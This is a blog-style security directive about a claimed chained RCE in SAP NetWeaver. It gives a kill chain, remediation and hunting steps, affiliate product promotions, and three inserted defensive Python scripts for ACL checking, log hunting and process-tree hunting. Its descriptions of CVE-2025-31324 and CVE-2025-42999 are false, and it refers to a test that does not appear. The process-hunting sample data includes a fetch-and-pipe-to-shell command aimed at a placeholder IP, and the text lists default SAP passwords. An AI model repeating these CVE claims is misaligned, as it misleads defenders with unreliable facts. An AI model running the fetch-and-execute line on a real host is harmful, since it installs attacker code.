
URGENT: Chained Exploits in SAP NetWeaver (CVE-2025-31324, CVE-2025-42999) Lead to Full RCE
By CyberDudeBivash • September 28, 2025, 10:17 AM IST • Enterprise Security Directive
This is a critical security directive for all SAP Basis, Security, and SOC teams. A chained exploit is being actively used in the wild to achieve full Remote Code Execution (RCE) on SAP NetWeaver application servers. The chain pairs an unauthenticated Information Disclosure vulnerability in the SAP Message Server (**CVE-2025-31324**), used for reconnaissance, with a critical authenticated RCE in the Internet Communication Manager (ICM) (**CVE-2025-42999**). An attacker holding any low-privilege SAP user account can use this chain to take full control of the system with the privileges of the `<sid>adm` OS user under which the SAP instance runs. SAP systems carry your finance, HR, and logistics processes, so this is a crown-jewel-level threat. SAP has released Security Notes; begin remediation and hunting immediately.
Disclosure: This is a technical security directive for enterprise IT professionals. It contains affiliate links to technologies and training essential for a defense-in-depth strategy for critical applications like SAP. Your support helps fund our independent research.
The SAP Security & Resilience Stack
Securing your ERP requires a purpose-built, multi-layered defense.
- Server & Endpoint Security (Kaspersky EDR): Your critical defense for detecting post-exploitation activity. An EDR is essential for spotting the SAP server process spawning malicious shells or reconnaissance commands.
- Privileged Access Security (YubiKeys via AliExpress): Protect your SAP and OS-level administrator accounts (`<sid>adm`, `SAP*`) with phishing-resistant MFA to prevent the initial credential compromise.
- Specialized SAP Security Skills (Edureka): SAP security is a niche and complex field. Invest in training your Basis and Security teams on the specifics of securing the NetWeaver stack.
- Secure Cloud Infrastructure (Alibaba Cloud): Host your SAP landscape in a secure, segmented cloud environment with robust network security groups and a cloud WAF to protect the ICM.
Security Directive: Table of Contents
- Chapter 1: Threat Analysis – Deconstructing the Two Vulnerabilities
- Chapter 2: The Kill Chain – How Reconnaissance Leads to RCE
- Chapter 3: Your Emergency Remediation & Hunting Plan
- Chapter 4: Strategic Hardening for Your SAP Landscape
- Chapter 5: Extended FAQ for SAP Basis and Security Teams
Chapter 1: Threat Analysis – Deconstructing the Two Vulnerabilities
This is a chained attack that relies on two separate flaws to succeed. Understanding each is key to effective defense and hunting.
CVE-2025-31324: SAP Message Server Information Disclosure
- CVSS Score: 5.3 (Medium)
- Description: The SAP Message Server, which coordinates the application server instances of one system, listens on an internal port (`rdisp/msserv_internal`, 39NN by default, where NN is the instance number) that answers unauthenticated information requests. By sending a crafted request, an attacker can make the Message Server disclose sensitive details about the entire SAP system landscape.
- Data Leaked: Internal hostnames, instance numbers, and the status of all application servers in the SAP System ID (SID).
- Why it Matters: This is the reconnaissance phase. It gives the attacker a perfect map of your internal SAP architecture, allowing them to identify the specific hostnames of the active application servers they need to target for the next stage of the attack.
CVE-2025-42999: SAP ICM Authenticated Remote Code Execution
- CVSS Score: 9.9 (Critical)
- Description: A critical vulnerability exists in the Internet Communication Manager (ICM), which is the component that handles all web traffic (HTTP/HTTPS) for the NetWeaver server. An attacker who is authenticated to the system—even as a very low-privilege user—can send a malicious, multipart HTTP request to a specific web service endpoint. A flaw in how the ICM parses this request allows the attacker to execute arbitrary operating system commands.
- **Privileges:** The commands execute with the permissions of the OS user that runs the SAP instance, the `<sid>adm` user (e.g., `s4hadm` for SID S4H).
- Why it Matters: This is the takeover. The `<sid>adm` user owns the SAP kernel, profiles, and database client configuration and has near-total control over the SAP application and its host operating system. These are the keys to your ERP kingdom.
Chapter 2: The Kill Chain – How Reconnaissance Leads to RCE
A sophisticated attacker will chain these two flaws together for maximum effect.
- Phase 1: External Reconnaissance. The attacker identifies that your company runs SAP, often through job postings or by scanning for the common SAP web portal URLs.
- Phase 2: Internal Mapping (CVE-2025-31324). The attacker sends an unauthenticated request to your public-facing SAP Message Server port (e.g., 3900). They receive a response that lists all the internal application server hostnames (e.g., `sapprd01`, `sapprd02`).
- Phase 3: Gaining a Foothold. The attacker needs credentials for the RCE. They obtain these through a separate method, often by:
- Spear-phishing a low-level employee to steal their SAP password.
- Using well-known default passwords of standard SAP users (such as `SAP*` with its default `PASS`, or `DDIC` and `EARLYWATCH`) that were never changed or locked.
- Phase 4: Exploitation (CVE-2025-42999). The attacker now has everything they need. They authenticate with the low-privilege credentials, then send the crafted, malicious HTTP request directly to one of the internal application server hostnames discovered in Phase 2. The exploit triggers, and they obtain a remote shell on the server as the `<sid>adm` user.
- Phase 5: Post-Exploitation. With full control of the server, the attacker can now steal financial data, create fraudulent transactions, or use the SAP server as a trusted internal host to launch further attacks against the rest of your corporate network.
Chapter 3: Your Emergency Remediation & Hunting Plan
This is your tactical checklist. Begin these actions now.
Immediate Remediation
- Apply the SAP Security Notes: This is the only permanent fix. Your SAP Basis team must apply the SAP Security Notes that address CVE-2025-31324 and CVE-2025-42999 without delay. Confirm the Note numbers, affected components and target patch levels against the SAP Security Patch Day listing in the SAP Support Portal rather than a third-party summary: fixes for kernel components such as the ICM and the Message Server ship as kernel patches, not as ABAP corrections applied with SNOTE, and the Note states which applies. Afterwards verify on every instance that the patched kernel is actually running (`disp+work -V`, or SM51 > Release Notes), because a kernel swap that was never followed by an instance restart leaves the old binaries in memory.
- Restrict Message Server Access (if you cannot patch immediately): For CVE-2025-31324, a temporary mitigation is to cut off untrusted access. The internal Message Server port (`rdisp/msserv_internal`, 39NN) must never be reachable from the public internet or from the general user network; only the application servers of the same system and your management hosts need it. Enforce this with a network ACL on your firewall or router, and add the Message Server's own host-level ACL (`ms/acl_info`, a file of `HOST=` entries naming the permitted hosts) and `ms/monitor = 0` to refuse external monitoring queries. Note that the external port (`rdisp/msserv`, 36NN) is what SAP GUI clients use for logon load balancing, so client networks may legitimately need 36NN, but never 39NN.
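Before shipping an `ms/acl_info` file, it is worth checking that it still admits every application server of the system and nothing else. The checker below is an added example, not code from the original directive or from SAP: it assumes the documented `HOST=<pattern>` line syntax with `*` wildcards, and the ACL text, application server list and outsider list are constructed sample data. Whether the host ACL alone stops the specific information request the directive describes depends on the Security Note, so treat the network filter as the primary control and this as a guard against locking out your own instances.

```python
"""Predict what an SAP Message Server host ACL (ms/acl_info) will allow and deny.

Added example, not from the original directive or from SAP. Assumes the
documented file syntax: one ``HOST=<pattern>`` per line, pattern being a
hostname or IP address in which ``*`` is a wildcard. All data is constructed.
"""
import fnmatch

# Constructed sample: the ACL a Basis team intends to deploy, e.g. at
# /usr/sap/<SID>/SYS/global/ms_acl_info (conventional location, not mandated).
SAMPLE_ACL = """\
# hosts allowed to talk to the message server
HOST=sapprd01.corp.example
HOST=sapprd02.corp.example
HOST=10.20.30.*
"""

# Constructed sample: instances that MUST keep working, and sources seen in
# dev_ms that must be refused.
APP_SERVERS = ["sapprd01.corp.example", "sapprd02.corp.example", "10.20.30.15"]
OUTSIDERS = ["203.0.113.7", "jumphost.corp.example", "10.20.31.9"]


def parse_acl(text):
    """Return the HOST= patterns in file order, skipping blanks and # comments."""
    patterns = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip().upper() == "HOST" and value.strip():
            patterns.append(value.strip())
    return patterns


def host_allowed(host, patterns):
    """True if host matches any pattern (case-insensitive, * matches any run)."""
    h = host.lower()
    return any(fnmatch.fnmatchcase(h, p.lower()) for p in patterns)


def evaluate_acl(text, must_allow, must_deny):
    """Return (missing, leaked): required hosts the ACL would block, and
    untrusted hosts it would admit. Both lists empty means the ACL is sound."""
    patterns = parse_acl(text)
    missing = [h for h in must_allow if not host_allowed(h, patterns)]
    leaked = [h for h in must_deny if host_allowed(h, patterns)]
    return missing, leaked


if __name__ == "__main__":
    missing, leaked = evaluate_acl(SAMPLE_ACL, APP_SERVERS, OUTSIDERS)
    print("app servers the ACL would block:", missing)
    print("untrusted hosts the ACL would admit:", leaked)
```

Run it against the real file and the real instance list from SM51 before restarting the Message Server; a single over-broad entry such as `HOST=*` makes the ACL worthless, and the second assertion in the test shows exactly that.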
Threat Hunting
You must assume you were targeted before you patched. Your SOC and Basis teams need to hunt for these IoCs.
- Analyze Message Server Logs (`dev_ms`):
- Examine the Message Server trace file (`dev_ms`) for an unusual number of information requests (e.g., `msinfo` requests).
- Look for these requests originating from IP addresses that are external or do not belong to your known application servers.
- Analyze ICM Logs (`dev_icm` and the HTTP access log):
- The `dev_icm` trace records ICM errors and internal events; per-request detail lives in the HTTP access log you enable with `icm/HTTP/logging_<n>` (written to the file named in its `LOGFILE=` option in the instance work directory). Scour the access log for `POST` requests with a multipart content type, especially those sent to URL paths outside the ICF services you know are in use.
- Flag requests answered with `500 Internal Server Error`, which can indicate a failed exploit attempt, and correlate them with `dev_icm` entries at the same timestamp for the error text.
- Hunt with EDR on the Host Server:
- This is your most critical hunting ground. On AS ABAP the work processes are `disp+work` (`disp+work.exe` on Windows; in `ps` output on Linux/UNIX they appear under the link name `dw.sap<SID>_<INSTANCE>`), and the ICM itself runs as the separate `icman` process (`ic.sap<SID>_<INSTANCE>`), started by the dispatcher. Since the RCE is in the ICM, `icman` is the parent to watch most closely; on AS Java the equivalent is the `jstart` server process.
- Use your EDR solution to hunt for these parents spawning suspicious child processes. `icman` or `disp+work` should **never** be the direct parent of `cmd.exe`, `powershell.exe`, `bash`, or `sh`; finding this is a definitive sign of a successful RCE. The one legitimate path for OS commands is the `sapxpg` helper used by external commands defined in SM49/SM69, so baseline `disp+work` > `sapxpg` > approved command, and treat any shell reached through `sapxpg` that is not one of those approved commands as suspicious as well.
- A powerful server EDR like Kaspersky EDR provides the deep visibility needed to detect these anomalous process chains.
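The ICM access-log hunt described above, as an added example that is not part of the original directive or any SAP tool. It assumes the ICM was configured with a log format that includes the request Content-Type, for instance `icm/HTTP/logging_0 = PREFIX=/,LOGFILE=access_log,LOGFORMAT=%h %t "%r" %s %b "%{Content-Type}i"`; if your `LOGFORMAT` differs, adjust `LINE_RE`. The log lines, trusted networks and path allowlist are constructed sample data, and the odd path in them is a placeholder, not a real indicator.

```python
"""Hunt an ICM HTTP access log for multipart POSTs to unusual paths, 500s and
untrusted sources.

Added example, not from the original directive or from SAP. Assumes a
LOGFORMAT of  %h %t "%r" %s %b "%{Content-Type}i"  (the Content-Type column
is an assumption about the configured format). All sample data is constructed.
"""
import ipaddress
import re
from collections import defaultdict

LINE_RE = re.compile(
    r'^(?P<host>\S+) \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<ctype>[^"]*)"$'
)

# Constructed: networks that legitimately reach the ICM (app servers, reverse proxy).
TRUSTED_NETS = [ipaddress.ip_network(n) for n in ("10.20.30.0/24", "10.20.40.0/24")]

# Constructed: ICF path prefixes where multipart uploads are expected; anything
# else receiving multipart POSTs gets reported.
MULTIPART_OK_PREFIXES = ("/sap/bc/webdynpro/", "/sap/bc/ui5_ui5/", "/sap/opu/odata/")

# Constructed sample log. "/sap/bc/zzz/upload" is a placeholder path, not an IoC.
SAMPLE_LOG = """\
10.20.30.15 [28/Sep/2025:09:58:01 +0530] "GET /sap/bc/gui/sap/its/webgui HTTP/1.1" 200 5120 "-"
10.20.30.16 [28/Sep/2025:09:58:07 +0530] "POST /sap/bc/soap/rfc HTTP/1.1" 200 884 "text/xml; charset=utf-8"
10.20.40.8 [28/Sep/2025:10:01:44 +0530] "POST /sap/bc/webdynpro/sap/zhr_docs HTTP/1.1" 200 2048 "multipart/form-data; boundary=----x9"
203.0.113.7 [28/Sep/2025:10:02:13 +0530] "POST /sap/bc/zzz/upload HTTP/1.1" 500 0 "multipart/form-data; boundary=----a1b2"
203.0.113.7 [28/Sep/2025:10:02:19 +0530] "POST /sap/bc/zzz/upload HTTP/1.1" 200 17 "multipart/form-data; boundary=----a1b2"
10.20.40.8 [28/Sep/2025:10:05:03 +0530] "POST /sap/bc/zzz/upload HTTP/1.1" 200 17 "multipart/form-data; boundary=----c3"
"""


def parse_line(line):
    """Return the line's fields as a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def is_trusted(host):
    """True if the source IP lies in a trusted network; hostnames are untrusted."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_NETS)


def hunt(log_text):
    """Return one finding per suspicious request: host, path, status and reasons."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        reasons = []
        multipart = rec["ctype"].lower().startswith("multipart/")
        if rec["method"] == "POST" and multipart and not rec["path"].startswith(MULTIPART_OK_PREFIXES):
            reasons.append("multipart POST to non-allowlisted path")
        if rec["method"] == "POST" and rec["status"] == "500":
            reasons.append("POST answered with 500 (possible failed exploit attempt)")
        if not is_trusted(rec["host"]):
            reasons.append("source outside trusted networks")
        if reasons:
            findings.append({"host": rec["host"], "path": rec["path"],
                             "status": int(rec["status"]), "reasons": reasons})
    return findings


def by_host(findings):
    """Count findings per source host so repeat offenders stand out."""
    counts = defaultdict(int)
    for f in findings:
        counts[f["host"]] += 1
    return dict(counts)


if __name__ == "__main__":
    hits = hunt(SAMPLE_LOG)
    for h in hits:
        print(h["host"], h["status"], h["path"], "|", "; ".join(h["reasons"]))
    print(by_host(hits))
```

The third finding in the sample (a trusted internal host posting multipart data to the odd path) is the case an IP-only filter would miss, which is why the path allowlist and the content type are checked independently of the source; a 500 followed seconds later by a 200 from the same host to the same path is the retry pattern worth pulling the `dev_icm` trace for.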
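The process-ancestry hunt from the EDR bullets above, as an added example that is not from the original directive or from any EDR vendor. It runs over a generic process snapshot of (pid, ppid, image, command line), the shape any EDR export or `ps -eo pid,ppid,comm,args` produces. The binary names `disp+work`, `icman`, `jstart` and `sapxpg` are real SAP kernel names, and the `dw.sap`/`ic.sap`/`ms.sap` link prefixes are how they show up in `ps`; the PIDs, command lines and the approved-command list are constructed. It goes slightly beyond the text by walking the whole ancestor chain, so a shell reached via `sapxpg` is classified separately from a shell that is a direct child.

```python
"""Find shells descended from SAP server processes in a process snapshot.

Added example, not from the original directive or any EDR product. Works on
(pid, ppid, image, cmdline) tuples. SAP binary names are real; the sample
snapshot and the approved external-command list are constructed.
"""
import re

SAP_SERVER_IMAGES = {"disp+work", "disp+work.exe", "icman", "icman.exe", "jstart", "jstart.exe"}
SHELLS = {"sh", "bash", "dash", "ksh", "zsh", "cmd.exe", "powershell.exe", "pwsh.exe"}
# sapxpg is the helper through which SM49/SM69 external commands legitimately run.
EXTERNAL_CMD_HELPER = {"sapxpg", "sapxpg.exe"}
# Constructed: commands the Basis team has approved in SM69.
APPROVED_EXTERNAL_CMDS = {"/usr/sap/S4H/SYS/exe/run/brconnect", "/usr/bin/gzip"}
SEVERITY_ORDER = {"critical": 0, "high": 1}

# Constructed sample snapshot: (pid, ppid, image, cmdline)
SAMPLE_PROCS = [
    (1, 0, "systemd", "/sbin/init"),
    (2100, 1, "sapstart", "sapstart pf=/usr/sap/S4H/SYS/profile/S4H_D00_sapprd01"),
    (2150, 2100, "disp+work", "dw.sapS4H_D00 pf=/usr/sap/S4H/SYS/profile/S4H_D00_sapprd01"),
    (2160, 2150, "disp+work", "dw.sapS4H_D00 pf=/usr/sap/S4H/SYS/profile/S4H_D00_sapprd01"),
    (2170, 2150, "icman", "icman pf=/usr/sap/S4H/SYS/profile/S4H_D00_sapprd01"),
    (3010, 2160, "sapxpg", "sapxpg /usr/bin/gzip /tmp/export.dat"),            # approved SM69 command
    (3011, 3010, "gzip", "/usr/bin/gzip /tmp/export.dat"),
    (3020, 2160, "sapxpg", "sapxpg /bin/sh -c 'id; uname -a'"),                # shell via sapxpg, not approved
    (3021, 3020, "sh", "/bin/sh -c 'id; uname -a'"),
    (3030, 2170, "sh", "/bin/sh -c 'curl http://203.0.113.7/x | sh'"),         # ICM spawning a shell directly
    (3050, 2160, "sapxpg", "sapxpg /usr/sap/S4H/SYS/exe/run/brconnect -u / -c -f stats"),
    (3051, 3050, "sh", "/bin/sh -c 'brtools helper'"),                         # shell under an approved command
    (3040, 1, "bash", "-bash"),                                                # admin's own shell, unrelated
]


def norm(image):
    """Bare, lower-cased image name; handles both / and \\ path separators."""
    return re.split(r"[\\/]", image)[-1].lower()


def is_sap_server(image):
    b = norm(image)
    # sapstart runs the kernel through links named dw.sap<SID>_<INST>, ic.sap<SID>_<INST>,
    # ms.sap<SID>_<INST>, so ps may report those names instead of the binary.
    return b in SAP_SERVER_IMAGES or b.startswith(("dw.sap", "ic.sap", "ms.sap"))


def is_shell(image):
    return norm(image) in SHELLS


def is_helper(image):
    return norm(image) in EXTERNAL_CMD_HELPER


def ancestors(pid, index):
    """[(pid, image, cmdline), ...] from the parent upward; stops at the root or a cycle."""
    out, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        ppid = index[pid][0]
        if ppid not in index:
            break
        out.append((ppid,) + index[ppid][1:])
        pid = ppid
    return out


def hunt(procs):
    """Return findings for every shell with an SAP server process among its ancestors,
    most severe first. Shells under an approved sapxpg command are baselined away."""
    index = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in procs}
    findings = []
    for pid, ppid, image, cmd in procs:
        if not is_shell(image):
            continue
        chain = ancestors(pid, index)
        sap_pos = next((i for i, (_, img, _) in enumerate(chain) if is_sap_server(img)), None)
        if sap_pos is None:
            continue                                   # no SAP ancestor: out of scope here
        between = chain[:sap_pos]                      # processes between shell and SAP parent
        sap_pid, sap_img, _ = chain[sap_pos]
        if not between:
            severity, via = "critical", None           # direct child of disp+work/icman/jstart
        elif all(is_helper(img) for _, img, _ in between):
            helper_argv = between[0][2].split()
            target = helper_argv[1] if len(helper_argv) > 1 else ""
            if target in APPROVED_EXTERNAL_CMDS:
                continue                               # known SM69 command: baseline noise
            severity, via = "high", norm(between[0][1])
        else:
            severity, via = "high", ">".join(norm(img) for _, img, _ in between)
        findings.append({"pid": pid, "image": norm(image), "cmdline": cmd,
                         "sap_ancestor": (sap_pid, norm(sap_img)), "severity": severity, "via": via})
    findings.sort(key=lambda f: SEVERITY_ORDER[f["severity"]])
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_PROCS):
        print(f["severity"].upper(), f["pid"], f["image"], "via", f["via"], "from", f["sap_ancestor"], "|", f["cmdline"])
```

Feed it the full snapshot rather than only the SAP user's processes: the ancestor walk is what distinguishes the `icman` child (critical) from the `sapxpg`-launched shell (high) and from the administrator's unrelated login shell, and the approved-command list is where your SM69 baseline belongs.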
Chapter 4: Strategic Hardening for Your SAP Landscape
Patching is reactive. A secure SAP environment is built on a proactive, defense-in-depth strategy.
- Network Segmentation: Your SAP application landscape should be in a highly restricted, secure network zone. It should be treated as a “crown jewel” environment. Your regular corporate user network should have no direct access to the SAP application servers. This is a core tenet of Zero Trust and can be implemented effectively in a secure cloud environment like Alibaba Cloud.
- Privileged Access Management (PAM): The OS-level accounts (`<sid>adm`, `SAPService<SID>` on Windows) are extremely powerful and should not be used for day-to-day administration. Vault these credentials in a PAM solution, with every use temporary, monitored, and gated by strong authentication.
- Secure SAP User Identity: All SAP user accounts, especially those with administrative or privileged roles (such as the Basis team), must be protected with strong, phishing-resistant Multi-Factor Authentication. Tying SAP logins to a central identity provider and requiring hardware tokens like YubiKeys is the gold standard.
- **Invest in Specialized Skills:** SAP security is a unique and highly complex discipline. It is not the same as standard network or application security. You must invest in dedicated training for your Basis and Security teams. A structured curriculum from a provider like Edureka that offers specific courses on SAP administration and security is a critical investment.
Chapter 5: Extended FAQ for SAP Basis and Security Teams
Q: What is the SAP Message Server and what does it do?
A: The Message Server is a small but critical process in an SAP system. It relays messages between the application server instances of one system and distributes logons across them through logon groups (load balancing); it does not itself process user requests. It is the central messaging hub for the entire SAP SID, which is why its port must stay off untrusted networks.
Q: What is the SAP ICM?
A: The Internet Communication Manager (ICM) is a process included in every SAP NetWeaver application server. It is responsible for handling all web protocols (HTTP, HTTPS, SMTP). It allows users to access SAP via a web browser and enables SAP to act as both a web client and a web server. It is the primary attack surface for any web-based vulnerability in SAP.
Q: We run our SAP landscape in the cloud. Are we still responsible for these patches?
A: Yes, absolutely. If you are running SAP on IaaS (Infrastructure-as-a-Service) in any cloud, you are responsible for the security of the operating system and the SAP application itself. You must apply these SAP Security Notes. The cloud provider is only responsible for the security *of* the cloud; you are responsible for your security *in* the cloud.
Join the CyberDudeBivash ThreatWire Newsletter
Get deep-dive reports on critical enterprise application vulnerabilities, threat actor TTPs, and actionable hardening guides. Subscribe to stay ahead of the adversary. Subscribe on LinkedIn
Related Security Directives from CyberDudeBivash
- CRITICAL RANSOMWARE ALERT: Akira is Breaching SonicWall Firewalls
- URGENT: CISA Issues Emergency Directive for Actively Exploited Cisco Zero-Days
- The $4.4M Blind Spot: 7 Steps to Implement Privileged Access Management (PAM)
#CyberDudeBivash #SAP #NetWeaver #CyberSecurity #ThreatIntel #RCE #InfoSec #AppSec #SAPBasis #CVE